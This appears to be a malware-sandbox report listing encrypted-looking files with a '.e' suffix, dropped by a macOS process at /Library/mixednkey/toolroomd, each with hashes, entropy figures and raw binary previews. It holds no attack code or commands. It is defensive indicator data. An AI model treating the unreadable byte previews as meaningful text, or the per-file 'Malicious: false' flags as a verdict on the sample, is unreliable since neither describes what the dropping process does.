SHA-512:	E605C3EC2E4B46CF1F7FE6B52BE8DBCB7C471F7903AC031B9AE7438A4C27D57E4A20BCBF030CDFB4C5457BABEC8B9D73DFF559E24050D6498DDFB924C0B43D4D
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.p....V>.hR..%.......s..]3.X-.....\|.T.9..sba..X" ..?\[.J.9....bC.H.Lr_g_.h..7.=f.Z.NIn.I.2.F...\|.izBPWy......+W..#.Q.......^....Dh.Hq.k._>..T..@....['...!......b..p.=..A...z......x....#D...c.....!.v.x....,.j..Q...b....Qg...~AgU..?.d......T.'.=...X.4Y.=...1..b$.i...W.c0....Gv...D..@...;.....U.....L.l%).&..G.9....mC.XR.e..1.<g.$.u`1. :...r....H.y..BQ.V.S.j=1..aN..u+i).......<'...n..3&...2.......%E.5..<.\.7M.}.Oh.(....GU..'X$.!..L..j..-\...1.I...O.. ...m..GVrx.]sK.l1.$0..@......Q.p. ..BX5..d/...VS%h.:.....Q..q..O.......'...b.}.....!Wy...o.].K^kr..}.7....S=..Q..zx..........z....Qh...ul.T5y#.`(.9............^....\|....X.....@_4..34B.(g%.~.u.. ..Nq..^4~a..uh.=...:.h.c.;..!v....../..Z.`....lv\|$...2.:.a..tL.hB...J.8..]s..)..G.gaX0J.s.Q1g.\.......'.6T(R m..w..%.....O3......6............hV.G......Rdxz.....7.....F...3w....<.(....%..5......7F......................\.........^./k..`R..V5..jd..ysVT9.X

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.ZapfinoRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	2834
Entropy (8bit):	7.783988238444796
Encrypted:	false
SSDEEP:	48:r+QwDxtXpsxzLXV7F7DxHFR9rAHkiGdskgp7Mg0uC4Zuse8ZRF3eNpq:r+QwDxkxzLXV7pHAE0kgp0ufZQ8Z7uu
MD5:	0F5EC2398BF7A1F0249BCD8E5DC1D9BA
SHA1:	5E74AD84A9AE4E887497BAFD4068BB0CDEAEC58F
SHA-256:	437F2BB62C0297FAE3746577CD01F678111FE78D82D20F1CD712C22DCCDC74CA
SHA-512:	D326C1C7B4726E6EB47B44CF87B4DC3950869C6A3AB48A8A9AD9464F0DEBE30D796F7C40EBC9E60BAFDA8DFCCF7D36EC9247434EF136AFB6345C2066C23F795D
Malicious:	false
Preview:	.<.\|.....f.A....\|......2..,...c8kn...i .Y.a..".l.l.G@.......`N2?.6..t.&...E..&.tq...+=.8...\|U.H8....hr.5A\#7.Zp...i.....\|nl.a!z.d...f.>".#@w@.......,..vyf.,...Y.D.n...........e....P.:Ha"......T...ih.A..?M.8E..5)0..U..c..-...?.....d...y#P..]....o.d0~S.+m..yA@.;m......5U....i.....A....n...)....6f.&........U.~..H..dZ.@.S..Pg.;..tNt...~..k+.....V...4S6.........\|q...R.....%..8..c.J._..T......V<....A-..B.7>...e...fr...q.WD..$.r..F.L~.+p..C...+..\|.a.i...1[IZ...#.2.1G+..ye._w...G.Q~........=.XG8..%V..../e...1.0..v...D.Xs..[.#...c..gC.m.&..=.~7.B..Tz..L.{qMg......X..>.....l\|T.u.r.h.H..A..R&..../.~F\.b..}N.>>..Ha.#H....r}.#. .J~~...5....T..b......l.#....1_.D..n.$..r....,..1z.....k._..i.\...p....C....'......tK.....D.I.S.4....\|J.. ..6....m....9.f'.[........'.R.~8Z..@Z.y.....d..\...)3.......=.L..j>.I.=..rC4.+pht...i.u.*....6_9......f1...........z..Q...\|O..}..E."qZh.1.Eb....MA......O......T.^.5.....>.....(...b4w0..].:...3.lw.h.....`,.8. q..i.

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/Office/16.0/.microsoft onenote_Rules.xml.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	382649
Entropy (8bit):	7.949424569611214
Encrypted:	false
SSDEEP:	6144:3r0VxyENHSc39xw8RZIOBEg/NJ8bitaGlRGEIARHrRfL+R8ul5:IzyEbwaXBf8bitaGTGEIcHFfK8uH
MD5:	485B419237B8AA4F4704BD730607022D
SHA1:	C89F1A7166E84368071EF4CD1ADC4A644591748E
SHA-256:	E109D3193B2EA0A7D761EA1E76BFCF5AAD561B655252FA227233312E1C7EA65F
SHA-512:	67C0BB7EBDB8688B9152CC5C16C6C3198F88E48015DE034CCC012ECEA1F0E951202F97B032E801871C5F053B95102727727131D5C53418B6C8CEC1661D540010
Malicious:	false
Preview:	.....0..wMv..T.I.O.p%.E..............!.+B.......H...G\i[%L..&.V#..%.,..+.w, .Yx!.vz.....N..4.E6(..i.j..$1.l.......{...J&.$..1nT..VW./.....1..h........9.#f.B5"A@I.}....#~..!..{y4jY....p......l....'@....~......S.lCyRsJ....l.\t...-.WyM.Ey....Z.M$!%eAkq..q...!........q[J.......?.E......Rk..SWk_v. ......w.SP....V.1.i...3W.?x....m).hd..8.5.1..N:tq.a.....;......,P-..f.=o..7...@d..+.&.$Pf.'..LZ...wo.&.....F..J]U..cX...s1.X.E.\.A.EQ.w,.....\|[..o.w.J...cE....w.jN..%+.Oo....4.Y.......d..N.`S.[.....1.-..J.,....w. y\.o...X.7..'n....-..J.,.#d~...\.o...X.....&.l.v@9+.GeQ.xb.o.5!# ....O/+...C........)......q.9.......h]E.g9.....J.uN.u....:d.^..&.J.Y..6.u.:3..&.f....r.1.1.?q6...........-..&C..........C...o..H.A.".IX~..A%.c..,.S..5n....bSC.0..P.....-.....x:......C... ..!#...u..2p.D8....H`.}..4i..!.$.M...p.M"q..D...`.7.B0..3T5=F..\V.[...'w....Ir04;..%.c..,.S...p...........5n.......^6.n8..(......[*:.}...\...:I.......).!...e.....4.....,P-...1.D.w

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Caches/Microsoft/uls/com.microsoft.onenote.mac/.ci.plist.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	370
Entropy (8bit):	5.06781356840152
Encrypted:	false
SSDEEP:	6:UquYOD5FNkBaBzsewLYHEec/LaqG8rQQwiQ/6:UgODp/sewLYTc+qGm7
MD5:	68864B3B1792CF216ACD45B87F463533
SHA1:	A2BCA5D014A0485FE7AAFFB7D301A168332F38D5
SHA-256:	593B4B733B1F817A6C7BE0B97A8B568B3759C1DF91DECFC2F5785FEDB60D03AF
SHA-512:	FCAB3B94CCEB7BEBD973EFD710F3C2BF5CFC515BA60CE0417127D74E1197196003DDAAB7A9B825C8E8C808217911A91E3A95B3D6E6F0272240BF6560036AE128
Malicious:	false
Preview:	...a>k..\.q.oL..M`..k......Y.O.u....rW..t....Sq6<.."a........A.................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Caches/Notifications/ONSharingNotifications/.settings.plist.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	578
Entropy (8bit):	6.311873540627579
Encrypted:	false
SSDEEP:	12:A57dZq6tBDjmeYqF94SOyVB+/rlrGsewLYTc+qGm7:Al7q6/DjmeX94J0grksePc0m7
MD5:	1B602083EB931DA5C7FA9A60E5C3C18C
SHA1:	EA40534F3B2A8C8A02A418ED0BA83E2829911982
SHA-256:	65802E8A37172A58517B2A6E0611024F54952DC01916FA565A849596ADBD2A7F
SHA-512:	FC4AEBB1554F69D10151117CD986198664EDE5E2D2CAC7CADED8962A84FA52B01120FC77286519BD13BFDBFA15C21B2BCED1D702ABDD9F4CFDD7B0D3A39B0333
Malicious:	false
Preview:	.....0..wMv..T.I.O.p%.E..L#...z`...}...._..}.kdD.A....."..,....<....w.4.h..........up..H?..8..\9......<...d./....3.j.`..O......^.G\..9..LL..{IX.#...>#,.R.3jE0...Py.Ndi~Cz..~.l.._U..i..[....W...p...$.sB....2..............._.....O\.....\|)...z-1.w....$@[....9Q.%W...................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Caches/com.microsoft.onenote.mac/.Cache.db-shm.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	33091
Entropy (8bit):	3.311007485153375
Encrypted:	false
SSDEEP:	24:Wa00RVaNgwQ0000000000000000000000000N00000000000000000000000000/:t7NHNpq
MD5:	2E8271BF8F55C068ACDF363AC9AF4874
SHA1:	293A5F246B5CA66204CB8D3B601A6DC768550146
SHA-256:	033E228ECBAB1C6848EF974889A2EE3A9697BBB986D31E52745EE3CF3CE242A7
SHA-512:	962ABDA0597A71F6BFE9B78ECE231EA34A26F68ACD9FEB161797362030FA5C15EFF5703946F529C56E769C7CDBAB83D7DB21A51D3BDC41D7ACF71D5C728837CF
Malicious:	false
Preview:	f...#D...z.Ydf].6<.."a..6<.."a..6<.."a........&f...#D...z.Ydf].6<.."a..t....Sq6<.."a........&6<.."a.....q.A"&...q.A"&6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Caches/com.microsoft.onenote.mac/.Cache.db-wal.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	305
Entropy (8bit):	4.228051880921369
Encrypted:	false
SSDEEP:	3:Nlyehm/zRKeL8LYjdNE+WSxLjRclwiOnM1aalXG8rQIndwiQ/xb4:iBzsewLYHEec/LaqG8rQQwiQ/6
MD5:	8BEDCE739E73CE30812FEBB62DC6F04E
SHA1:	43D58C3C2A9132DDE3C42E810E963FE17455B722
SHA-256:	C89DBEE3D89A9986626113AC3B14A83F93D6A0A2B273EF1CCB6E03F009F7D020
SHA-512:	D1A1D3637228696B1DA13BF1522751922B2852D09B1BA25CAD2F668523B7C2213A1270A38FEC5761D5DB862BE82B04B7142EA821517188F15C574C3B7399577A
Malicious:	false
Preview:	..................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Caches/com.microsoft.onenote.mac/.Cache.db.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	53589
Entropy (8bit):	3.6002540756289614
Encrypted:	false
SSDEEP:	48:76HBY3OO/2sbj028GRp/oLP+501K2TxD4XRB2JOGNpq:8RujDL/oLGm11B4hBwOGu
MD5:	E5C69991B806747EB3DA44EB1B5D363B
SHA1:	D7E3043F587D863F4B431FE820FA7D2CC845E9B7
SHA-256:	6903FA1C8E197DE062FE16F785C450E1D15010B691AB5F4AA1107AC4BE360BA7
SHA-512:	D66647724DE84DB8091E7DB7AF7B1BD73E8E48D09F21360ED8B369B1448C3C3935977CC11B7607CB7106997155E4D2A3F6EDCB135E4351C0709A5221AD911AF2
Malicious:	false
Preview:	..d.=..._t.........X...vi..b..6<.."a....I,`...ax..J.....7...x..7...xt....Sq6<.."a...2.I6.1..P.>.T.Z..Y#)j12"..-..!....`..u.;2.c-/.6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Preferences/.com.microsoft.onenote.mac.plist.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1426
Entropy (8bit):	7.465490955509243
Encrypted:	false
SSDEEP:	24:UIM2TLOxMZ038vZAHWLrZgex31GFbHWF0YTg9jrjXXnGsePc0m7:T/C38vZAH2rZgeFGRHWFwnLGNpq
MD5:	C735CD00541122854D78644537740B53
SHA1:	1CF3F9099F286BBD11033FDA4A1631BB38167E8E
SHA-256:	AC5EBF16939DA427A1046DC23DE85D7E1812887CD8F137FEDA797BF8D63D9B15
SHA-512:	E4B0BCF733295198449FAF7C2325D977A25DCE27255999F1078EC24684E3B6BCA4984DEE79879DEEF0914D6A147C63F748C2D30C64E87747B61943F813085388
Malicious:	false
Preview:	...a>k..F.p.:{....G..F.sk.`dQ.G.@.C.$z...#H,.I....F...t...^7..6.L.1"s.M~...K.%.......x..Q.w.W\(`.s..<........B.....S....h.. ...A...A..?..@He.........$......xQc....=9......$...[U;L.........V...i\|...5..A7....DZ.Rjo(.\|. ..p.....=0..?.#@1.6.........F.:l...W.e...?^de8]..P.2...8.....<.[a]w.i...$_Lx.).a.......X....w1..0.ps.._S7.V...lQ}...d.....z}}..R]t..w.z..R.Ic.2.P.%t.....&.f.c g...>64.CX"/q..&..]..xk]>..E...9"....:.&........v.......G~..&..AO.....}.s.K.#....f..R....N..rE.w....A.v.d./...."1.+l..m.GM.x...&5Y.3.9...Z#[C..."..Hq.l:t..g8...@......:...t....\...n0l.V...\o(.\|. ..[>.V..6.5...2(.j\|b...;.L.P...Jd.j..%.j.q..[...4E..Q..\|.z...\JfW.....%$zx......AM)..)f/.h..j.P...V..B.(;..5.f`.0...w....m......fc...Dp.7......h..8c.t..g...4....oP@.M.P;.n.L,P.<=H.Ce.7:.>..,..7S7.Gdd..:..'R.$H.r..W..c....,I7.y`...L.0..)t....K.NRh..AA.Bd....3i.n.w..BSYn^.7/s...Iu....i.?....A...R.i.Y..c..>...>.C=..dh.6.l....(;..5.f<...`.1UE...C&..5i.G.~C.d..}....L.%...

/Users/berri/Library/Cookies/.com.microsoft.OneDriveStandaloneUpdater.binarycookies.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	530
Entropy (8bit):	6.017014514493463
Encrypted:	false
SSDEEP:	6:BTrH/BI495I0oNtKwdbm1rly18220La5EnntaBzsewLYHEec/LaqG8rQQwiQ/6:JzJ5I0oN41x8Z20YOnYsewLYTc+qGm7
MD5:	B45F08470828BDBDFAA42D67E547FF01
SHA1:	BCF268FF035CC4A24881AAEB0C71CD973A4F6099
SHA-256:	58D74D714790A3FF33BAFC8CD572E3F919954F8640BB0D3FBB803EF785A697F2
SHA-512:	52DCA90AFAC131748222C182C7AA5D7CDC61C690B4771BD42017D8C1D8552CDB766A1370DC79A6129BEB28201811FBEC61F236138608F74A5A69D1AE12EE11FF
Malicious:	false
Preview:	......I....0.........?.&..iy..16<.."a....RBnc.E.QrXV......Z......m.\Di.....E1BV..MYj..`vf;..q..=#.V..=...c..\.o.PpC.H\..v...........j..:a.....g...{..U....w...3.+..R&.SF.."...Z."2a.....xJ?.C..&.%.F....6<.."a....#.Rm...................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/Library/FontCollections/.Fixed Width.collection.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	2706
Entropy (8bit):	7.757834546203554
Encrypted:	false
SSDEEP:	48:v4L+QZmJ9v9prx4CHWWJMG2BNxGfU9FdQcjhCnkZVbcQl+jsWNpq:wKQQvprZWPG2BNxYUBQkUkZlP+bu
MD5:	873EE917C068F0C45DF5C378898578E7
SHA1:	7E9E44FFCA97128CC92ECA95C1C981DD7B88D690
SHA-256:	A8DF98212EB615980CE4BB8C6603F946C1FE71002D0B65BBC5FFCFC8CB5B11A7
SHA-512:	881C94D2E3948E7D4611C6D96A150FC3D9EE9F6A1BF83E33B0D605B7AE42EE401AC6DDB3E55B15F00B21CB60B015835E29883328A91EABBA2A6822D9F19771FF
Malicious:	false
Preview:	...a>k..._..w...p.b.`.zN\|...F...=.... ht..8....c~.o5..d..@.Y...:$A.oh.n.R.w4...!..s....~`..Pnay..9.t.h..".z3......i..f.1,.'...^.<.b...B.+<J,$.C.i..M....j..W..b.-..;g.{.8.4v....[.C...Z....jw........d<u{..V6..?..T..;..A9.w.f...Uu>.M.e....hZ_TB..+c..##..a...........)....UF."j<...q..^........\....Q..............'..w...^A.GE.b.f...{...<... ........5T..L.......w...B..U[.........6q"......x.."....[..Z.J....c.~.}Wr...FD..w.....o...d...{; .#....2..+qHm.>.i?r...+`..qd..i....\L.....j...\....#..67!h.!.?=...~.#6...8o0.)".....O.V....9......Ke...H....a.c).K.N.:.....eJ.+...qX..i....y.....6u....4v....{C.[G......o.......\|<..V5]]...'..P...~..w.i.M.#......0"....wt~...?.........IL..-......[.'b.>.G.KR.&g...........i...!Nh1........M..J.H...g.s;.w#F){...f.. .'t.....[*..Y...(l....:R.k.....M....K...AG...U..e{.<a..k.(..^...x..0......x;.q. ....v....B.L...]t.ZM.I....H.-f..^RXr.5N.,..~.g..:...._..20.U.{.0.$..0;.R..~F.B..{..1.g.u...a..;~.n9+.+...%.@........p...^>...L..

/Users/berri/Library/FontCollections/.Fun.collection.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1186
Entropy (8bit):	7.3182633528792245
Encrypted:	false
SSDEEP:	24:UmGs5nnbAH0EKrxdasBF9uOe89M/ZGdRjFx3w3yCcwz6hGsePc0m7:l1FkDKrxbF9uN86x8jL3sG/GNpq
MD5:	C52DC4EA65D653EA7A072A83A2B310D6
SHA1:	4E653ACDA70724D0A681BBB0E7048E1CF1F620E2
SHA-256:	188AA4B7438AF53CBCADDF47E88D35A7E6512FBEFB61834B1DFF0561684ED591
SHA-512:	AC9606DFB53D77AD51123A1E9685086C955E4F968C392E0BC2A271B4A37184A289183DC9477CD26CE409813E1FE7D2F08F13BD7C2DC11151F4AEA42996CFC7E2
Malicious:	false
Preview:	...a>k...6...\....~b.+..eG...kiD.jq...5...sJ7..=\..v../N".+...k.:...o.i...4v....Ay..OY.-....... .T..L..A...1..L:#<..."F........o....KO...a:.........2y....r.7.!uzN@.....(.C..o.A.Jz.X.....qX..Z.~..'.?A.ot;.H._.f...HP,$.C.i..]..s..{.}.A.9w.&`.....b!J..........g8P....G...$..3.,.=2-w..!.1..zD.....n....%.P.+......]...u/.9.....b.5.~..8Y....w..`.f..5....o[-.1U..x..t1U..~...^..6I:...(.Wi..2...2j..[....&h.,..`.......n......fU..>.....Uq\|..'b.o....i.......p..9....p.j....=.%.....Lb..z;T.....u........R@...A..l..r...K.C..^.........:.......=@-...%JD1,..)+.....yO\|.wdQ...i?r...+`....{.=S_[.....F......9....v.z\Ao0.)"....Y.7......Or....d..3..4.?.y!........ ..K.......1..-.y3.}.,@...uz~......kq.g..\....6.h..3.T...uO.`....lN.....n........\|a;..}.k.e3.C.i.@.c.F.....`...@.H...,.....B...J.J.p...EV.wW.3..n.l....u.jr..N$$..6<.."a...w/..6<.."a...q.................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s

/Users/berri/Library/FontCollections/.Modern.collection.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1122
Entropy (8bit):	7.284881127253885
Encrypted:	false
SSDEEP:	24:UmGledJE9+CZzphASvclV5URCQrV4Sf+4zmpX0EkFUsePc0m7:l7D0+CZzprclV5URCYxmpX0EkKNpq
MD5:	F1024BA92D1B17EF5246EA3D2B725484
SHA1:	BC4A8D3499DBF3B42BDA813AF8D0D4B595697F05
SHA-256:	79929796DDAFD4C5A86F536FDD76502F950166791E7D738F5AC3A3EFC7A05C54
SHA-512:	2F07CEF22A1873881D0F6190D0DC1DB588D4008A58CDDC63016E6CA33CEF6FED446352D27923458EC758D9F9AEA447A998C2E77B9A24C1312CE0D2E5736E235B
Malicious:	false
Preview:	...a>k...6...\....~b.+..eG...kiD.jq...5...sJ7..=\..v../N".+...k.:...o.i...4v....Ay..OY.-.........\1w...B..mW..?F.9Lu.....%.p.0lO..]...C].l....by....n......o3-..........s.?.d.#...s5]]...'..$..3.,..8....{:...r[.......&Mf.r....^.....2....}....!....-....8......d...{; .#....2.uB.yb.].8..fcJ..#.R.`~.....&B..].c..}.e0,.&9..d..@[o.nG..b....5.;..>.~.$.D_).6.,..J..y....m&.TJ.k.S.C.gj8.........j....i.D.".R$.-...{.p.,).(........W..b.-.Q....:.cPd....x.t.2..2.4_.Y..e.....v.vH1.....{=s......9...~(...o...}F...!..\|..Vf.H_...........j.k.p....f,..!J..K.q.t.uZ22..........d.#...s5]]...'..1..%x.g..1...E<7.............1/s.U5.......s......wl.#..-`#-...B >...H=R......P.....+{.P+.K%0}.=E..F.z....M./.C.=..r..h..:....H.....\|AG.....f.........D...L.5u2H...C....P.,....wn..M...6<.."a..C./..9r..1.................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1..........................

/Users/berri/Library/FontCollections/.PDF.collection.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1170
Entropy (8bit):	7.311779230111984
Encrypted:	false
SSDEEP:	24:UmGs5nnbAH0EKrPhz6K6xzDKwnxGCjFxqF1TYsePc0m7:l1FkDKrP6lnfjLqFdYNpq
MD5:	43E6BF6C46F162A0AFFDD5BEE5904285
SHA1:	D7ECA0932CED4F4D9638E37EF2653CF8B74C4261
SHA-256:	DF9978617536F054AC139573CBE91D0368A123EEB2F97987F3A96AB60C0B27AB
SHA-512:	A0C28973F5D3A294D4DFDBE7E36EFB54D1C9EB96709585670720D9C43BEF37D06023CD28326DB88F37DF28654E06230E5DDA949241ED1A7EF1A49600664118AE
Malicious:	false
Preview:	...a>k...6...\....~b.+..eG...kiD.jq...5...sJ7..=\..v../N".+...k.:...o.i...4v....Ay..OY.-....... .T..L..A...1..L:#<..."F........o....KO...a:.........2y....r.7.!uzN@.....(.C..o.A.Jz.X.....qX..Z.~..'.?A.ot;.H._.f...HP,$.C.i..]..s..{.}.A.9w.&`.....b!J..........g8P....G...$..3.,.=2-w..!.1..zD.....n....%.P.+......]...u/.9.....b.5.~....@..5w....V....vx.~/...q..u.".j.0.S.H...6q"......x.."......_..T...Xgf....d:\|.Jn.'[.c......Bo.x%..5.ql<..b.L.E....\C]?b.>ow.2....g.pO..0.E..M ?t.Q..........U..t.m...pXG..yq.&/.i...f.u.M...7sd..f.b...p(..N...HwK.J..\|.wdQ...s`..=......{.=S_[.....F......9....v.z\Ao0.)"....Y.7...Y.5...H.d..3..4.?.y!........ ..K.......1..-.y3.}.,@...uz~......kq.g..\....6.h..3.T...H..L.....c..,...aQp_...{K...5.M........y[.Q]Qbc.-..QPOu[T.'...90....Nn.....3..wq...M......8Y.e.b.=r..N$$..t....Sq.a.8 Y\.6<.."a...a.................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T

/Users/berri/Library/FontCollections/.Traditional.collection.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1362
Entropy (8bit):	7.42316180988453
Encrypted:	false
SSDEEP:	24:UWmrgHO9SWxwg9yOrOOTQr4SvAQ5DwWW3zU4t798u+iK/bF8qZPsePc0m7:VmrFSNOK4SvARFU4h9N+iKbF8qlNpq
MD5:	16D8AAEDE11B1C1400BA3D465B84504A
SHA1:	85A083C9F9F0AF23FE86C2410F36F760098B8F8E
SHA-256:	AF5DEC0BF806E4080CB43F877FF8B12FFD3978C82A45C065EB1785612845084F
SHA-512:	17E4A6AC13D4845D9DB9F6CA25F1E71B3F6DAE63C917A9724B45B57225A5B54CBD444A96011768073936CE55910F5AFD6438E9E6BE50ADB13C7D3D55D39AEDC9
Malicious:	false
Preview:	...a>k...U,.V....-5...~....V.....4ZIR...b)......-.....0.ct.L.,$.C.i..KT..G.(.{....\|1>....(,.......>...D\....W........p.l..T....&..wF...d......e?6[.5D.d...p[.!6........'.c..a:.......$.i`._.R.,..O."Au{.U...W{.'.....h...wV...z.....@.F._QAz..M.h.i.]k..g7..z.~.....F...l.j..:.y.F.....W{.'......;.ht..qhh....8[..C.W....x5A.^G.Xk{=.;...7;.....I/.=C..\|...zu.....D...y.9.2.%..lv.'....d$.M..@...d.~b.V.J......4m...;..A9.w.f...Uu.d...VrSa...h$V.."c....s..W.g...R......Yb\Oa.m._.NT..0.;.$.'..@.$#:..g.#....P=(.".!.....1.$....A:qV.....F..$..3.,.UfD6..XS.b.o.!:sP.E/.[.....I".Fx.E._..._....Pu.2.. ..p..y....K../Z.Q'RF.2ce.c..$.?.v.D.P.t....s.M..G}.....g.E..p;.b...:^...{@..;...3.>.K.._...7N...&.A.y.....P....^xM...w.M/-..Wu.7..?....%L....K.TJ.k.S.+.o...W:)..]Q...Qt?%.......n..V..>..@x......H....&Y.0....!".bw...k1...$..xp4H.D.q..I~r...].F .(W&....w..m.#TD.W)D.rzK`.#Z..Q.W.O.....y.2[.V....;..QnX{......8.a.......?. .....aE).Z[.,.....D"..M.....w...V..l!.$.~...1.C?.).

/Users/berri/Library/FontCollections/.Web.collection.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1474
Entropy (8bit):	7.484732241610118
Encrypted:	false
SSDEEP:	24:UmGapMwNTwK7pCURfQ1Gv0CT2/Q54kXfxkKk3XwmOHoAu2YsePc0m7:lTpMWJgURf+GvPTZl+3gPONpq
MD5:	D31B9D0A0B2F055BB20467D0B851E359
SHA1:	DC650B29D53F1D5C49ECCF879036E594DE087D72
SHA-256:	5FD47E4A35B9FD570B6A738C6042E8091140E110124A1FBDFF0D96EE50AB2573
SHA-512:	555495A2747FDB62FE45A6F9E5431905013C967A00C6DB03AB7B719F71C1C798BF2E31A0CD4BA0593D884771503003A9B7C6C7B8B420D3B647BC7C0FDD9E5C5C
Malicious:	false
Preview:	...a>k...6...\....~b.+..eG...kiD.jq...5...sJ7..=\..v../N".+...k.:...o.i...4v....Ay..OY.-......i..@.......i..s.Jo..lg.E..$j.LF.......(W.,.e.O...q-......Y.e.h..".z3...r.h.2.....be.0.2B.n...h.Y.w.U...!Dv,$.C.i..M....j..W..b.-..;g.{.8.4v....[.C...Z....jw..q.o....W._........Zyn..i..3Z....WH;.4.6..C...9..r[......UBG.T..w..=Q.f.(../..q."..P.....%r.m..;.$.'..@.$#:..]..P..6.mY.6Au......3.~.$.D_).6.,..J........Z.TJ.k.S.C.gj8.........j....i.D.".R$.-...~.:.C..(........W..b.-l...M...Q...\qV:b8t....(....g..Ru..;[..V48...Ig...I...{.&..d.1..f.v....>.u.p...".ec....)w.........B.6..5.=."..K.;.n 